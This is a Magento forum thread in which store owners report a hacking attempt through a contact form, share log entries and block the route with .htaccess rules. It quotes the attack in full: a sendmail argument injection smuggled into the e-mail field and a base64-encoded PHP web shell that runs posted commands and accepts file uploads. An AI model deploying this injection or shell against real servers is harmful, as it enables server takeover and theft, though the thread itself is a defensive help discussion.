- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Today i got an e-mail from my own magento store with the folowing message
Naam: Wendy Rosenberg
E-mail: "Wendy\" -oQ/tmp/ -Xskin/test.php "@aol.com
Telefoon: 9549463828
<?php eval(base64_decode('JHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KaWYgKCEkc2FmZW0wZGUpIHskc2VjdXJpdHk9ICJPRkYiO30NCmVsc2UgeyRzZWN1cml0eT0gIk9OIjt9DQplY2hvICcNCjx0aXRsZT5jY2ZyZXNoIHNpbXBsZSBzaGVsbDwvdGl0bGU+DQo8aDM+PGEgaHJlZj0iaHR0cDovL2NjZnJlc2gubWwvIiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOm5vbmU7IiB0YXJnZXQ9Il9ibGFuayI+PGZvbnQgY29sb3I9ImJsdWUiPmNjZnJlc2gubWw8L2ZvbnQ+PC9hPjwvaDM+DQo8cD48Yj5SZWFkeSBTdG9jazwvYj48L2JyPg0KfCBDQyBGcmVzaCB8IE1haWxlciB8IExlYWRzIHwgc0hlbGwgfCBjUGFuZWwgfCBTU0ggfCBSRFAgfDwvcD4NCjxiPlNBRkVfTU9ERSA6ICcuJHNlY3VyaXR5Lic8L2I+PC9icj4NCjxiPlVuYW1lIDogJy5waHBfdW5hbWUoKS4nPC9iPjwvYnI+DQo8Yj51aWQ9ICcuZ2V0bXl1aWQoKS4nICgnLmdldF9jdXJyZW50X3VzZXIoKS4nKSBnaWQ9Jy5nZXRteWdpZCgpLic8L2I+PC9icj4NCjxiPmN3ZCA6ICcuZ2V0Y3dkKCkuJzwvYj48L2JyPg0KJzsNCj8+DQo8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iPD9waHAgZWNobyAkX1NFUlZFUlsnUEhQX1NFTEYnXTs/PiI+DQo8dGFibGU+DQo8dHI+PHRkPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJnbyIgc2l6ZT0iMzUiPjwvdGQ+PHRkPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDb21tYW5kIiBzdHlsZT0id2lkdGg6IDc1cHg7IGhlaWdodDogMjBweDsiPjwvdGQ+PC90cj4NCjwvZm9ybT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8P3BocCBlY2hvICRfU0VSVkVSWydQSFBfU0VMRiddOz8+Ij4NCjx0cj48dGQ+PGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9Im15RmlsZSI+PC90ZD48dGQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ib2siIHZhbHVlPSJVcGxvYWQiIHN0eWxlPSJ3aWR0aDogNzVweDsgaGVpZ2h0OiAyMHB4OyI+PC90ZD48L3RyPg0KPC90YWJsZT4NCjwvZm9ybT4NCjw/cGhwDQppZiAoaXNzZXQoJF9QT1NUWydvayddKSAmJiBpc3NldCgkX0ZJTEVTWydteUZpbGUnXSkpIHsNCiRmaWxlID0gJF9GSUxFU1snbXlGaWxlJ11bJ3RtcF9uYW1lJ107DQokbmFtZSA9ICRfRklMRVNbJ215RmlsZSddWyduYW1lJ107DQppZiAoIW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZSwgJG5hbWUpKSB7DQplY2hvICc8Yj48Zm9udCBjb2xvcj0icmVkIj5VbmFibGUgdG8gdXBsb2FkIGZpbGU8L2ZvbnQ+PC9iPic7DQp9IGVsc2Ugew0KZWNobyAnU3VjY2VzcyBVcGxvYWRlZCBGaWxlIDxiPjxmb250IGNvbG9yPSJncmVlbiI+Jy4kbmFtZS4nPC9mb250PjwvYj4nOw0KfQ0KfQ0KaWYgKGlzc2V0KCRfUE9TVFsnZ28nXSkpIHsNCmVjaG8gIjxwcmU+IjsNCnN5c3RlbSgkX1BPU1RbJ2dvJ10pOw0KZWNobyAiPC9wcmU+IjsNCmV4aXQ7DQp9'));?>
when i executed this php code, i got this webpage
What can i do to remove this hack ??
My magento version is 1.9.3.1
Solved! Go to Solution.
Accepted Solutions
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
We've got the same here.
After some analysis of our log files we recognized that the attacker went the code throught a contact form wich i didnt know that it exists.
Its made of our Template "Passion" by Magesolution.com.
Its seems like the attacker tried to get some code in there over that form.
As a first step we blocked the /contacst/ and /contacts/index/ via .htaccess
RewriteCond %{REQUEST_URI} ^/contacts/index/? RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301] RewriteCond %{REQUEST_URI} ^/contacts/? RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
As i looked up my Log i didnt found any Files been placed. The request of a test.php results a 404 Error for him.
The attacker IP was: 148.251.173.52
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
before this hack i have set the return-path to no, 2 weeks ago
In my access log i find this:
148.251.173.52 - - [22/Jan/2017:12:22:25 +0100] "POST /contacts/index/post HTTP/1.1" 302 758 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
148.251.173.52 - - [22/Jan/2017:12:22:27 +0100] "GET /skin/test.php HTTP/1.1" 404 1295 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36"
But i cant find the test.php in the skin folder
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
Hello, I have the same problem since today, i had also put "the retrun path" to NO. Have you got news about this ?
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
Not yet,
But have you received a e-mail with the same content ?
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
Yes exactly the same at 2 times, and i turned off " Retrun-path" to "no" last week
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
I am still looking what kind of hack this is.
What i have done is create a .php file with only the content of that php script
<?php eval(base64_decode(.....));?>
open that file in a webbrowser an you will see a web page with a link to ccfresh.ml
You can also paste this content on a form in this website http://ddecode.com/phpdecoder/
It has to do with creditcards info as you wil see.
Can you inform me when you solved this hack ?
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
I hope it's not a hack but an attempt to hack. I am unfortunately not educated enough to solve this problem.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
If i find something about it, i will give the information
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
We've got the same here.
After some analysis of our log files we recognized that the attacker went the code throught a contact form wich i didnt know that it exists.
Its made of our Template "Passion" by Magesolution.com.
Its seems like the attacker tried to get some code in there over that form.
As a first step we blocked the /contacst/ and /contacts/index/ via .htaccess
RewriteCond %{REQUEST_URI} ^/contacts/index/? RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301] RewriteCond %{REQUEST_URI} ^/contacts/? RewriteRule ^(.*)$ https://yourdomain.com/? [L,R=301]
As i looked up my Log i didnt found any Files been placed. The request of a test.php results a 404 Error for him.
The attacker IP was: 148.251.173.52
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Our website has been hacked with eval(base64_decode
Grueff2 Thanks for solving this problem, and the rewrite rules
I didnt know the existence of that mailform to
My attacker has the same IP adres, and comes from Germany